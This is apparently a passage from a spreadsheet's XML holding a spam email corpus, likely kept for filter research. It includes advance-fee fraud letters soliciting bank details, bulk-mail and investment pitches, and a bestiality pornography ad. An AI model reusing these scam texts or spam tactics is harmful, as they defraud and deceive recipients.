    <t>637</t>
  </si>
  <si>
    <t>To: klugman_002@yahoo.com\nFrom: Chamberlin Klugman &lt;chamberlin@drunkandstoned.com&gt;\nDate: Thu, 18 Mar 2004 08:54:32 +0000</t>
  </si>
  <si>
    <t>Thu, 18 Mar 2004 08:54:32 +0000</t>
  </si>
  <si>
    <t>Chamberlin Klugman &lt;chamberlin@drunkandstoned.com&gt;</t>
  </si>
  <si>
    <t>klugman_002@yahoo.com</t>
  </si>
  <si>
    <t>IS URGENT GET BACK TO ME</t>
  </si>
  <si>
    <t>URGENT BUSINESS PROPOSAL  \nFROM: MR.CHAMBERLIN KLUGMAN\nB.I.BE (BANQUE INTERNATIONAL BENIN)\n\nDear Sir, \nIn order to transfer out (USD 45 MILLION) Forty Five million United \nStates Dollars) from  B.I.BE (Banque Internationale du Benin). I have \nthe courage to ask for your assistance to handle this important and \nconfidential business believing that you will never let me down either \nnow or in future. I am MR.CHAMBERLIN KLUGMAN,the MANAGER of the bank. \nThere is an account opened in this bank in 1980 and since 1990 nobody \nhas operated on this account again. After going through some old files \nin the records, I discovered that if I do not remit this money out \nurgently it will be forfeited for nothing. \nThe owner of this account is Mr. PAULTON ALLENS, a foreigner, and an \nengineer with  D&amp;D Engineering CO,and he died since 1990. No other \nperson knows about this account or any thing concerning it,the account \nhas no other beneficiary and my investigation proved to me as well that \nthis company does not know anything about this account and the amount \ninvolved is (USD 45M)  I want to transfer the [USD45M] Forty Five \nmillion United States Dollars into a safe foreigners account abroad , \nbut I don't know any foreigner, I am only contacting you as a foreigner \nbecause this money can not be approved to a local bank here, but can \nonly be approved to any foreign account because the money is in us \ndollars and the former owner of the account is Mr PAULTON ALLENS is a \nforeigner too. I know that this message will come to you as a surprise \nas we don't know our selves before,but be sure that it is real and a \ngenuine business. I only got your contact address through the \ninternet,hoping that you will never let me down in this business. \n I need your urgent reply  so that I will inform you  on the next step \nto take I will like you to Send also your private telephone and fax \nnumber including the full details of the account to be used for the \ndeposit. I want us to meet face to face or sign a binding agreement to \nbind us together so that you can receive this money into a foreign \naccount or any account of your choice where the fund will be safe. I \nwill fly to your country for withdrawal &amp; sharing and other \ninvestments. I am contacting you because of the need to involve a \nforeigner with foreign account and foreign beneficiary. I need your \nfull co-operation to make this work fine because the management is \nready to approve this payment to any foreigner who has correct \ninformation of this account, which I will give to you later \nimmediately, if you are able and with capability to handle such amount \nin strict confidence and trust according to my instructions and advice \nfor our mutual benefit because this opportunity will never come again \nin my life. I need truthful person in this business because I don't \nwant to make mistake I need your strong assurance and trust. With my \nposition now in the office I can transfer this money to any foreigner's \nreliable account, which you can provide with assurance that this money \nwill be intact pending my physical arrival in your country for sharing. \nI will destroy all documents of transaction immediately we receive this \nmoney leaving no trace to any place. You can also come to discuss with \nme face to face after which I will make this remittance in your \npresence and two of us will fly to your country so at least two days \nahead of the money \ngoing into the ccount. \nI will apply for annual leave to get visa immediately I hear from you \nthat you are ready to act and receive this fund in your account. \nI will use my position and influence to effect legal approvals and \nonward transfer of this money to your account with appropriate \nclearance forms of the ministries and foreign exchange  departments. At \nthe conclusion of this business, you will be given 35% of the total \namount, 60% will be for me, while 5% will be for expenses both parties \nmight have incurred during the process of transferring. \nI look forward to your earliest reply. \n\nTHANKS AND GOD BLESS, \n\nYOURS SINCERELY, \n\nMR.CHAMBERLIN KLUGMAN. \n\n\n\n\n_____________________________________\nGet your webmail @ drunkandstoned.com\nUnlike your crack habit... it's free!\n\n[URL]http://www.drunkandstoned.com[/URL]\n\n</t>
  </si>
  <si>
    <t>http://www.drunkandstoned.com</t>
  </si>
  <si>
    <t>635</t>
  </si>
  <si>
    <t>To: webmaster@aclweb.org\nFrom: Oladimeji Afolabi &lt;afolabi_olu@hotvoice.com&gt;\nDate: Thu, 18 Mar 2004 01:18:20 +0100</t>
  </si>
  <si>
    <t>Thu, 18 Mar 2004 01:18:20 +0100</t>
  </si>
  <si>
    <t>Oladimeji Afolabi &lt;afolabi_olu@hotvoice.com&gt;</t>
  </si>
  <si>
    <t>Are you there?</t>
  </si>
  <si>
    <t>Hello,\n\n\nI am the son of an immediate past Minister of an\nAfrican country who was removed from office because\nof an aledged US$214million when he was a member\nof the nationl identity card scheme in that\ncountry.He is going to be brought before the\ncountry's Independent Corrupt Practices and Other\nRelated Offences Commission (ICPC) in which most of\nhis personal accounts both within and outside the\ncountry has been frozen.\n\nI am using this medium to solicit for your\nassistnce in trnsferring some huge amount of money\nmy father deposited in a security firm in Europe,as\nof date this funds are yet to be discorvered.Based on\nthis you are to assist in transferring the funds to\nyour own personal accounts from where we shall\nre-invest the funds in a legitimate business so that\nit cannot be traced to my father.If you are willing to\nassist you will have 20% of the initial sum and a\nfurther 20% of whatever investment we go into. \n\nI do not need to spell out the importance of the\nneed for secrecy considering the volatile nature of\nthe matter and the parties involved.We assume that\nmost of our phone  and fax lines will be tapped\nso,if you are willing to asist you are to list your\nphone and fax number so I can contact you.This is\nimportant as we will have to tallk about the\nmodalities of the transfer.\n\nTime is of great essence in this matter so if I do\nnot hear from your within the next three days I will\ntake it that you are not interested and will solicit\nfor a new partner.\nWaiting to hear from you.\nOladimeji Afolabi\n \nPS: For your perusal see this website.\n[URL]http://www.vanguardngr.com[/URL]\n[URL]http://www.vanguardngr.com[/URL]\n\n\n\n</t>
  </si>
  <si>
    <t>http://www.vanguardngr.com http://www.vanguardngr.com</t>
  </si>
  <si>
    <t>5221</t>
  </si>
  <si>
    <t>To: &lt;chris@kagi.com&gt;\nFrom: "Jennifer" &lt;jenniferb@doityourself.com&gt;\nDate: Thu, 18 Jul 2002 21:16:12</t>
  </si>
  <si>
    <t>Thu, 18 Jul 2002 21:16:12</t>
  </si>
  <si>
    <t>"Jennifer" &lt;jenniferb@doityourself.com&gt;</t>
  </si>
  <si>
    <t>&lt;chris@kagi.com&gt;</t>
  </si>
  <si>
    <t>[SA] Job Update</t>
  </si>
  <si>
    <t>This is the worst job market we've seen in over 30 years.  \n\nThe recent corporate scandals have further deepened the lack \nconfidence in our economy and the plunging stock market that\n is in the headlines this week will lead to additional layoffs creating \nan EVEN MORE DIFFICULT JOB MARKET.\n\nFinding a job in today's market is a whole new ballgame.  \n\nBlasting your resume to thousands of recruiters, posting your\nresume to job boards and responding to job postings and\nadvertisements works for only 5% of the job seekers using\nthese techniques.\n\nJob searching based upon the tried and true process and \ntechniques used by recruiting professionals works for 85%.  \n\nIt's a no-brainer.  Invest $19.95 + shipping/handling\n(fully tax-deductible) in the Get Hired Now Program.\n\nOur CD program will teach you EVERYTHING you need to know\nto quickly succeed in ANY job market.\n\nGet Hired Now teaches a full job search process - proactive techniques \nand insider tips used by senior staffing professionals who have spent \nover 20 years getting people hired.\n\nCall us toll free at 800-500-0406.\n\nMention this email and get a FREE JOB SEARCH WORKBOOK\n\n** We accept Visa, MasterCard and American Express!\n\n\n\n\n-------------------------------------------------------\nThis sf.net email is sponsored by:ThinkGeek\nWelcome to geek heaven.\n[URL]http://thinkgeek.com[/URL]\n_______________________________________________\nSpamassassin-Sightings mailing list\nSpamassassin-Sightings@lists.sourceforge.net\n[URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>4126</t>
  </si>
  <si>
    <t>To: stu@westernchief.com\nFrom: "Date.com" &lt;emailrewardz@emailrewardz.email-publisher.com&gt;\nDate: Thu, 18 Jul 2002 20:12:20 -0700</t>
  </si>
  <si>
    <t>Thu, 18 Jul 2002 20:12:20 -0700</t>
  </si>
  <si>
    <t>"Date.com" &lt;emailrewardz@emailrewardz.email-publisher.com&gt;</t>
  </si>
  <si>
    <t>stu@westernchief.com</t>
  </si>
  <si>
    <t>Meet other Singles just like you</t>
  </si>
  <si>
    <t>--TEP-2108411027.1463792894.1027038601 Content-Type: text/plain Dear STUART, Are you tired of searching for love in all the wrong places? Find LOVE NOW at Date.com! [URL]http://click.emailrewardz.email-publisher.com[/URL] Browse through thousands of personals in your area. JOIN FOR FREE! [URL]http://click.emailrewardz.email-publisher.com[/URL] - Search, E-mail &amp; Chat - Use Date.com to meet cool guys and hot girls. - Go 1 on 1 or use our private chat rooms. Click on the link to get started! [URL]http://click.emailrewardz.email-publisher.com[/URL] Find LOVE NOW! ---------------------------------- You have received this email because you have registerd with EmailRewardz or subscribed through one of our marketing partners. If you have received this message in error, or wish to stop receiving these great offers please click the remove link above.  To unsubscribe from these mailings, please click here: [URL]http://emailrewardz.tfmb.net[/URL] --TEP-2108411027.1463792894.1027038601 Content-Type: text/html EmailRewardz  never sends unsolicited email. You are receiving this message because you have  requested to receive special offers from affiliates of EmailRewardz. EmailRewardz brings you the highest quality offers with your privacy guaranteed.  If you no longer wish to receive these offers please follow the instructions at  the bottom of this message. MEET OTHER SINGLES              JUST LIKE YOU     Tired of searching              for love in all the wrong places?Find love now, the easy              way.     JOIN FOR              FREEFind your soul mate today!BROWSE THROUGH              THOUSANDS OF PERSONALS IN YOUR OWN AREA. CLICK                          HEREto Find Love Now!   You have received this email because you have registered with EmailRewardz or    subscribed through one of our marketing partners. If you have received this    message in error, or wish to stop receiving these great offers please read further    for removal instructions. Click here to unsubscribe from these mailings. --TEP-2108411027.1463792894.1027038601--</t>
  </si>
  <si>
    <t>http://click.emailrewardz.email-publisher.com http://click.emailrewardz.email-publisher.com http://click.emailrewardz.email-publisher.com http://emailrewardz.tfmb.net</t>
  </si>
  <si>
    <t>5224</t>
  </si>
  <si>
    <t>To: &lt;yyyy@spamassassin.taint.org&gt;\nFrom: "IQ - Ann Arbor" &lt;aa@insurancemail.net&gt;\nDate: Thu, 18 Jul 2002 19:01:00 -0400</t>
  </si>
  <si>
    <t>Thu, 18 Jul 2002 19:01:00 -0400</t>
  </si>
  <si>
    <t>"IQ - Ann Arbor" &lt;aa@insurancemail.net&gt;</t>
  </si>
  <si>
    <t>$50,000 Giveaway!</t>
  </si>
  <si>
    <t>This is a multi-part message in MIME format. ------=_NextPart_000_436A1_01C22E78.6D2241B0 Content-Type: text/plain; 	charset="Windows-1252" Content-Transfer-Encoding: 7bit  Ann Arbor Annuity Exchange $50,000 Giveaway!	  When You Think Annuities...Think Ann Arbor	 Just a short list of the many companies we represent 	  	  	 Fill out this form for a FREE entry in our $50,000 Giveaway!	  Name:	  	 E-mail:	  	 Phone:	  	 Fax:	  	 City:	  	State:	  	 	  	  	 	   	   Agent Use Only. Employees and family members of Ann Arbor Annuity Exchange and the  subsidiaries are ineligible. We don't want anybody to receive our mailing who does not wish to receive them. This is a professional communication sent to insurance professionals. To be removed from this mailing list, DO NOT REPLY to this message. Instead, go here: [URL]http://www.insurancemail.net[/URL] Legal Notice    ------=_NextPart_000_436A1_01C22E78.6D2241B0 Content-Type: text/html; 	charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable $50,000 Giveaway! =20              =20              =20              Just a short list of the many companies we = represent =20             =20                =20                    =20              =20             =20                =20                    =20                        =20                           Fill = out this form for a FREE entry in our $50,000 Giveaway! =20                           Name: =20                              =20                           E-mail: =20                              =20                           Phone: =20                              =20                           Fax: =20                              =20                           City: =20                              State: =20                              =20                             =20                                =20                              =20             =20                Agent Use Only. Employees and family members of Ann = Arbor Annuity Exchange and the                  subsidiaries are ineligible. We don't want anybody to receive our mailing who does = not wish=20                 to receive them. This is a professional communication = sent to=20                 insurance professionals. To be removed from this mailing = list,=20                 DO NOT REPLY to this message. Instead, go here:                 [URL]http://www.insurancemail.net[/URL] Legal = Notice=20                ------=_NextPart_000_436A1_01C22E78.6D2241B0--</t>
  </si>
  <si>
    <t>5225</t>
  </si>
  <si>
    <t>To: "Lista de destinatarios oculta" &lt;villahermosa@rebackee.com&gt;\nFrom: Quality Training de =?ISO-8859-1?Q?M=E9xico?= &lt;villahermosa@rebackee.com&gt;\nDate: Thu, 18 Jul 2002 18:16:04 -0500</t>
  </si>
  <si>
    <t>Thu, 18 Jul 2002 18:16:04 -0500</t>
  </si>
  <si>
    <t>Quality Training de =?ISO-8859-1?Q?M=E9xico?= &lt;villahermosa@rebackee.com&gt;</t>
  </si>
  <si>
    <t>"Lista de destinatarios oculta" &lt;villahermosa@rebackee.com&gt;</t>
  </si>
  <si>
    <t>[MLB-WIRELESS] CONTRALORIA Y GERENCIA ADMINISTRATIVA</t>
  </si>
  <si>
    <t>This is a multi-part message in MIME format --=_NextPart_2rfkindysadvnqw3nerasdf Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable [URL]http://www.rebackee.com[/URL] --=_NextPart_2rfkindysadvnqw3nerasdf Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable Content-Base: "[URL]http://www.rebackee.com[/URL]" Content-Location: "[URL]http://www.rebackee.com[/URL]" Untitled Document =20  Quality=20    Training de México,=20    lo invita al extraordinario seminario que tendrá lugar en VILLAHERMOSA,=20    TABASCO, los días 01 y 02 de=20    AGOSTO de 2002 =20    Este es un seminario=20      sobre los más efectivos conceptos y maneras concretas para mejorar=20      la función de Contraloría y Gerencia Administrativa.....¿=20      Que medidas debe tomar.... para enfrentar la Falta de Liquidez, Reducción=20      de Ventas, Aumento en los Costos, conflictos Laborales....¿ Cómo=20      anticiparse a un colapso en la empresa ?.   ¡¡=20      NO ESPERE A QUE SEA DEMASIADO TARDE =21=21 Se discutirá=20      ampliamente sobre la situación actual de las empresas en épocas=20      de crisis, ¿que están haciendo para salir adelante?. Así=20      como estrategias contables actuales, pronósticos de presupuestos,=20      modelos ABC y otras alternativas de flujo de información; como controles=20      y cumplimientos, información administrativa, reportes de gasto, crédito=20      y cobranza, análisis financiero y personal. Aspectos claves dentro=20      del programa : -=20      Como organizar su área y hacerla altamente competitiva -=20      Renueve su manera de utilizar los informes financieros -=20      Predictores de Quiebra....Acciones inmediatas a considerar        - Casos Históricos ¡¡LA=20      IMPORTANCIA DE CAPACITARSE CON LOS LÍDERES=21=21  Experiencia, Calidad y Éxito...       Quality Training de México, le ofrece los más aclamados consultores=20      y seminarios ejecutivos disponibles en el mercado...con los temas de mayor=20      impacto en las empresas... SONY de México,=20      Hewlett Packard, Casa Cuervo, Cervecería Modelo, PEMEX, Mexicana,=20      Molex y más de 4,000 empresas en México y Latinoamérica,=20      conocen nuestros exclusivos programas de capacitación. ¡ Un experto estará con usted en este=20      seminario =21   TEMARIO: 1.- El Nuevo Papel del Gerente Administrativo en=20      las Empresas Modernas.       - Funciones, responsabilidades y resultados.       - Trampas en la Planeación.       - El Plan de Contingencia. 2.-=20      La Gerencia Administrativa y el Análisis de Procesos, Políticas=20      y Procedimientos para controlar las operaciones de su empresa.       - Conocimiento de la empresa: Base para el análisis de procesos.       - Establecimiento de planes de operaci&amp;oacuten.  - Análisis de=20      funciones básicas: abastecimientos, producción, ventas, recursos=20      humanos.       - Bases para implementar políticas y procedimientos.  3.-=20      Control y Administración de Ingresos, el Crédito y la Cobranza.       - Organización del departamento de crédito y su manual de=20      políticas y procedimientos.       - Determinación de políticas de apertura y autorización=20      de crédito.       - Gestión de Cobranza.       - Concentración de fondos, cobranza electrónica y factoraje. 4.-=20      Control de Costos en la Empresa.       - Los costos en la administración empresarial.       - Reducción de Costos - Alcances -       - Presupuestos de costos.       - Control de rentabilidad y costos. 5.-=20      Renueve su Manera de Utilizar Informes Financieros.       - Problemas en la manera de elaborar informes financieros.       - Tipos, usos y elementos en los informes.       - Criterios para los informes: importancia, relevancia, prontitud y presentación.=20       6.-=20      Reportes Financieros para Evaluar la Productividad:       - Herramientas de Diagnóstico del resultado financiero.       - Valor Económico Agregado (EVA) como herramienta para medir la productividad.       - Enlace entre la estrategia global de la empresa y la información=20      financiera y administrativa.       - Información para medir y mejorar la competitividad: Ventajas y=20      desventajas competitivas.       - Concepto de los GAP&amp;=23146;S. ------------------------------------------------------------------------------------------------------------------------------------------------- PROGRAMA: 01 y 02 de AGOSTO de 2002       horario: 08:00 a 13:00 y de 14:30 a 17:30 hrs. INCLUYE: Información estratégica, material de=20      trabajo, reconocimiento con valor oficial, coffee break y la exposición=20      de un prestigiado consultor. FORMA DE INSCRIPCIÓN:       1.- Llenar debidamente la solicitud de inscripción.       2.- Cheque a nombre de: Quality Training Corporation, S.C.       3.- Depósito en Banamex Cuenta : 6680083 Sucursal 082 Centro=20      Financiero Paseo        4.- Enviar por fax la ficha de su depósito sellada.       5.- Debido al cupo limitado, únicamente se garantizarán las=20      inscripciones en el orden en que efectuaron su pago. INVERSIÓN:=20      =24 4,690 mas=20      IVA PRONTO=20      PAGO: =24 4,200 mas IVA (antes=20      del 25 de julio de 2002)  INFORMES=20      E INSCRIPCIONES: (993) 314 - 40 85=20      con 10 líneas =20        Si Usted no desea recibir mas=20      e-mails sobre nuestros exclusivos programas de capacitación o prefiere=20      que lo enteremos por otro medio favor de hacernos llegar sus comentarios=20      a: villahermosa_bajas=40rebackee.com If you don't want to receive=20      our information, write us an electronic mail indicating it to: villahermosa_bajas=40rebackee.com   ¡¡¡=20      Solicite Mayor información de Nuestros Exclusivos Programas =21=21=21 Quality=20      Training de México DIRECCIÓN DE=20      PROYECTOS VILLAHERMOSA       Conmutador 01 993 914 - 40 85 con 10 líneas villahermosa=40rebackee.com [URL]www.rebackee.com[/URL]   --=_NextPart_2rfkindysadvnqw3nerasdf-- To unsubscribe: send mail to majordomo@wireless.org.au with "unsubscribe melbwireless" in the body of the message</t>
  </si>
  <si>
    <t>http://www.rebackee.com http://www.rebackee.com http://www.rebackee.com www.rebackee.com</t>
  </si>
  <si>
    <t>5227</t>
  </si>
  <si>
    <t>To: fork@spamassassin.taint.org\nFrom: majormedical@excite.com\nDate: Thu, 18 Jul 2002 17:54:04 -0700</t>
  </si>
  <si>
    <t>Thu, 18 Jul 2002 17:54:04 -0700</t>
  </si>
  <si>
    <t>majormedical@excite.com</t>
  </si>
  <si>
    <t>Major Medical Breakthrough Huge Profit Potential</t>
  </si>
  <si>
    <t>\n\n|   | **Major Medical Breakthrough  \nHuge Profit Potential**  \n---|---  \n  \nImagine yourself as part owner of the most interesting, full service state-of-\nthe-art medical facility, equipped with the most sophisticated and effective\nscanning diagnostic tools available today.\n\nElectron Beam Tomography is a cutting-edge diagnostic technology capable of\nproviding a crystal-ball-like look into your medical future. This technology\nhas been featured on Oprah, Larry King, Good Morning America, and USA Today.\n\nEBT Scans are now covered by most health insurance companies and HMOs, causing\nan explosion in usership and exceptionally high demand for this procedure.\n\nEBT can identify heart disease years before a treadmill test would show an\nabnormality and many years before a heart attack might occur.\n\nA tremendous improvement upon standard computerized tomography, also known as\nCT or CAT Scan, Electron Beam Tomography provides images of a beating heart up\nto 10 times faster and clearer than other conventional scanners.\n\nThe dramatic capabilities of this spectacular technology should provide an\nextraordinary investment opportunity for those establishing state-of-the-art\noutpatient clinics, in order to provide the EBT body scan procedures to health\nconscious Americans. Projected 10-year return of 916%.\n\nA full-body scan using this technology can also be used to detect\nosteoporosis, aneurisms, emphysema, gallstones, hiatal hernia, degenerative\nspine conditions, as well as cancer of the lungs, liver, kidneys, and colon.\n\nImagine being instrumental in bringing the most revolutionary diagnostic and\npreventative medical device to the marketplace.\n\n$15K minimum investment required. Serious inquiries only.\n\nTo recieve your free video. Fill out this form.\n\nName:\n\n|  \n---|---  \n  \nPhone Number  \n(including area code):\n\n|  \n  \nMailing Address:\n\n|  \n  \nProvince / State:\n\n|  \n  \nPostal Code\n\n|  \n  \n|  \n  \nE-mail Address:\n\n|  \n|  \n  \n  \n  \n  \nTo be removed from this list please reply with UNSUBSCRIBE. Thank you.  \n  \n[URL]http://xent.com[/URL]\n\n</t>
  </si>
  <si>
    <t>5226</t>
  </si>
  <si>
    <t>To: &lt;iluesby@msn.com&gt;\nFrom: clones4ruddog00@juno.com\nDate: Thu, 18 Jul 2002 17:37:33 -0700</t>
  </si>
  <si>
    <t>Thu, 18 Jul 2002 17:37:33 -0700</t>
  </si>
  <si>
    <t>clones4ruddog00@juno.com</t>
  </si>
  <si>
    <t>&lt;iluesby@msn.com&gt;</t>
  </si>
  <si>
    <t>[ILUG] THE TRUTH OF INTERNET MARKETING--A REALISTIC WAY OF MARKETING</t>
  </si>
  <si>
    <t>We offer some of the best bulk e-mail prices on the Internet. We do all \nthe mailing for you. \nYou just provide us with the ad! It's that simple!\n\nprices start at   $200.00 for 1-million e-mails sent. \nour target list start at $400.00 for 1-million e-mails sent. \n\nWe give you a free mllion for ordering within 2 days.  I can also send \nyou the names on cd w/sending tools.  \nSo thats us mailing +\nthe names on CD with tools.\n\n209-656-9143\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>5215</t>
  </si>
  <si>
    <t>To: &lt;ldemers@sadmule.com&gt;\nFrom: info@templatestyles.com\nDate: Thu, 18 Jul 2002 14:57:14 +-0800</t>
  </si>
  <si>
    <t>Thu, 18 Jul 2002 14:57:14 +-0800</t>
  </si>
  <si>
    <t>info@templatestyles.com</t>
  </si>
  <si>
    <t>&lt;ldemers@sadmule.com&gt;</t>
  </si>
  <si>
    <t>[SA] Nice web page templates here. Check it out!</t>
  </si>
  <si>
    <t>Hello,\n\nI was recently browsing the internet and came accross some guys that are making really good job. \nHere they are - [URL]www.templatestyles.com[/URL] .\nCheck it out. Nice designs!\n\nyorth sincerely,\nMark Boen Lowen\n\n\n\n-------------------------------------------------------\nThis sf.net email is sponsored by:ThinkGeek\nWelcome to geek heaven.\n[URL]http://thinkgeek.com[/URL]\n_______________________________________________\nSpamassassin-Sightings mailing list\nSpamassassin-Sightings@lists.sourceforge.net\n[URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>www.templatestyles.com http://thinkgeek.com https://lists.sourceforge.net</t>
  </si>
  <si>
    <t>5230</t>
  </si>
  <si>
    <t>To: &lt;rstruthers@nut-n-but.net&gt;\nFrom: "Precious Shamp" &lt;mnereetcaenure@msn.com&gt;\nDate: Thu, 18 Jul 2002 13:29:03 -1700</t>
  </si>
  <si>
    <t>Thu, 18 Jul 2002 13:29:03 -1700</t>
  </si>
  <si>
    <t>"Precious Shamp" &lt;mnereetcaenure@msn.com&gt;</t>
  </si>
  <si>
    <t>&lt;rstruthers@nut-n-but.net&gt;</t>
  </si>
  <si>
    <t>Use your Computer to fix your Bad Credit.          9840</t>
  </si>
  <si>
    <t xml:space="preserve">  \n| ![](3D[URL]http://209.203.162.2[/URL]  \n![](3D[URL]http://209.203.162.2[/URL]  \n  \n![3D""](3D=)=  \nThank You,  \n![](3D[URL]http://209.203.162.2[/URL]  \n  \n---  \n![](3D[URL]http://209.203.162.2[/URL]  \n  \nYour email address was obtained from a purch= ased list, Reference #\n1320-15000.  If you wish to unsubscribe from t= his list, please Click here\nand e= nter your name into the remove box. If you have previously unsubscribed\nand are still receiving this message, you may email our Abuse Control= Center,\nor call 1-888-763-2497, or write us at: NoSpam, 6484 Coral Way, Miami, FL,\n33155".  \n  \n![](3D[URL]http://209.203.162.2[/URL]  \n(C) 2002 Web Credit Inc. All Rights Reser= ved.  \n  \n\n</t>
  </si>
  <si>
    <t>http://209.203.162.2 http://209.203.162.2 http://209.203.162.2 http://209.203.162.2 http://209.203.162.2</t>
  </si>
  <si>
    <t>5220</t>
  </si>
  <si>
    <t>To: fork@spamassassin.taint.org\nFrom: clubman@mail.com\nDate: Thu, 18 Jul 2002 12:55:08 -0700 (PDT)</t>
  </si>
  <si>
    <t>Thu, 18 Jul 2002 12:55:08 -0700 (PDT)</t>
  </si>
  <si>
    <t>clubman@mail.com</t>
  </si>
  <si>
    <t>You - the following ?</t>
  </si>
  <si>
    <t>V.I.P          Animal lovers club invite new members! No            shit! Only REAL ANIMAL porn ! Our super active members send           home video and photos every day! Don't miss this          offer !         CLICK to JOIN US ! [    remove my email from mail list ] [URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>5231</t>
  </si>
  <si>
    <t>To: &lt;embrionic@yahoo.com&gt;\nFrom: "Christina" &lt;my5muzq4k372@hotmail.com&gt;\nDate: Thu, 18 Jul 2002 12:26:10 -1900</t>
  </si>
  <si>
    <t>Thu, 18 Jul 2002 12:26:10 -1900</t>
  </si>
  <si>
    <t>"Christina" &lt;my5muzq4k372@hotmail.com&gt;</t>
  </si>
  <si>
    <t>Still paying too much for Life Insurance?...       U</t>
  </si>
  <si>
    <t>Save up to 75% on your Term Life Insurance!  \n_Compare rates from top insurance companies around the country_  \n  \n**In our life and times, it's important to plan for your family's future,\nwhile  \nbeing comfortable financially. Choose the right Life Insurance policy today.\n\n_Click the link below to compare the lowest rates and save up to 75%_**\n\n**COMPARE YOUR COVERAGE**\n\nYou'll be able to compare rates and get a free application in _less than a\nminute!_\n\n***Get your FREE instant quotes...  \n*Compare the lowest prices, then...  \n*Select a company and Apply Online.**\n\n**GET A FREE QUOTE NOW!**  \n_You can't predict the future, but you can always prepare for it._  \n  \n  \n\n  \n  \nto be excluded from future contacts\n\nkanz [URL]http://xent.com[/URL]\n\n</t>
  </si>
  <si>
    <t>5204</t>
  </si>
  <si>
    <t>To: yyyy-cv@spamassassin.taint.org\nFrom: Steve Adler &lt;steveadler@allexecs.com&gt;\nDate: Thu, 18 Jul 2002 10:47:10 +0800</t>
  </si>
  <si>
    <t>Thu, 18 Jul 2002 10:47:10 +0800</t>
  </si>
  <si>
    <t>Steve Adler &lt;steveadler@allexecs.com&gt;</t>
  </si>
  <si>
    <t>Proven way to get a job....</t>
  </si>
  <si>
    <t>------ack1234 Content-Type: multipart/alternative; boundary="----alt_border_1" ------alt_border_1 Content-Type: text/plain; charset="ISO-8859-1" Content-Transfer-Encoding: quoted-printable Greetings! One of the best ways land a new job quickly, especially in a  tight job market, is to email your resume to as many  recruiters as possible that work in your area and specialize in people with your skills. However, finding these recruiters and sending them each an  email can be an enormous amount of work. Many have  successfully used ResumeMailman.com to email their resume to 1000's of these recruiters instantly! This service has exceptional recruiter targeting, long  standing experience, and a great reputation with a huge group of quality recruiters. ResumeMailman network recruiters have connections to tons of unadvertised jobs. Your resume is instantly emailed to 1000's of recruiters in your selected areas, specializing in your  selected skill sets. The whole process can be completed in about 10 minutes flat! You can even get a free confidential email address with your order AND receive a contact list of all the recruiters who received your resume! Just check out:  [URL]http://www.allexecs.com[/URL] - it's easy. Since 1998 ResumeMailman.com's resume distribution engine has helped tens of 1000's of people distribute their resume and  get jobs.  Why not let them do the same for you. Sincerely, Steve Adler steveadler@allexecs.com =========================================================   The staff of AllExecs.com have years of recruiting  experience and may from time to time send you a review of  career tips and tools that have helped others in their job  search. If you'd rather not receive these reviews go to [URL]http://www.allexecs.com[/URL] ========================================================= ------alt_border_1 Content-Type: text/html; charset="ISO-8859-1" Allexecs.com Greetings! One of the best ways land a new job quickly, especially in a tight job market, is to email your resume to as many recruiters as possible that work in your area and specialize in people with your skills. However, finding these recruiters and sending them each an email can be an enormous amount of work. Many have successfully used ResumeMailman.com to email their resume to 1000's of these recruiters instantly! This service has exceptional recruiter targeting, long  standing experience, and a great reputation with a huge group of quality recruiters. ResumeMailman network recruiters have connections to tons of unadvertised jobs. Your resume is instantly emailed to 1000's of recruiters in your selected areas, specializing in your selected skill sets. The whole process can be completed in about 10 minutes flat! You can even get a free confidential email address with your order AND receive a contact list of all the recruiters who received your resume! Just check out  [URL]http://www.resumemailman.com[/URL] - it's easy. Since 1998 ResumeMailman.com's resume distribution engine has helped tens of 1000's of people distribute their resume and get jobs.  Why not let them do the same for you. Sincerely, Steve Adler steveadler@allexecs.com ========================================================= The staff of AllExecs.com have years of recruiting  experience and may from time to time send you a review of career tips and tools that have helped others in their job search. If you'd rather not receive these reviews go to [URL]http://www.allexecs.com[/URL] ========================================================= ------alt_border_1-- ------ack1234--</t>
  </si>
  <si>
    <t>http://www.allexecs.com http://www.allexecs.com http://www.resumemailman.com http://www.allexecs.com</t>
  </si>
  <si>
    <t>5214</t>
  </si>
  <si>
    <t>To: &lt;fork@spamassassin.taint.org&gt;\nFrom: "NTM - MailPound" &lt;info@mailpound.com&gt;\nDate: Thu, 18 Jul 2002 10:29:04 -0400</t>
  </si>
  <si>
    <t>Thu, 18 Jul 2002 10:29:04 -0400</t>
  </si>
  <si>
    <t>"NTM - MailPound" &lt;info@mailpound.com&gt;</t>
  </si>
  <si>
    <t>Earn High Commissions for Booking Online</t>
  </si>
  <si>
    <t>![]([URL]http://www.mailpound.com[/URL] |  |\n![]([URL]http://www.mailpound.com[/URL]  \n---|---|---  \n_NORTHSTAR Travel Media, LLC   and MailPound.com, a division of SMART Travel\nTechnologies, Inc. provide travel professionals with information, services and\nmarketing solutions_  \n\n* * *  \n  \n**_Attention:_  \nTravel agents, outside agents, independent agents, corporate travel agents:**  \n  \n![]([URL]http://www.mailpound.com[/URL]  \n(Click for more information)  \n\n\nMailPound is a Trademark of SMART Travel Technologies, Inc.  \n  \n  \n\n![]([URL]http://209.202.177.149[/URL] If you do not want to receive\nthese messages in the future, please ******click here**.\n\nPLEASE DO NOT REPLY to this email.  For questions or comments on this offer,\nplease contact the supplier.  \nFor all other inquiries, please email us at support@mailpound.com.  \n  \n\n[URL]http://xent.com[/URL]\n\n</t>
  </si>
  <si>
    <t>http://www.mailpound.com http://www.mailpound.com http://www.mailpound.com http://209.202.177.149 http://xent.com</t>
  </si>
  <si>
    <t>5213</t>
  </si>
  <si>
    <t>To: fork@spamassassin.taint.org\nFrom: megan@mail.com\nDate: Thu, 18 Jul 2002 05:58:03 -0700 (PDT)</t>
  </si>
  <si>
    <t>Thu, 18 Jul 2002 05:58:03 -0700 (PDT)</t>
  </si>
  <si>
    <t>megan@mail.com</t>
  </si>
  <si>
    <t>Day, when dreams come true!</t>
  </si>
  <si>
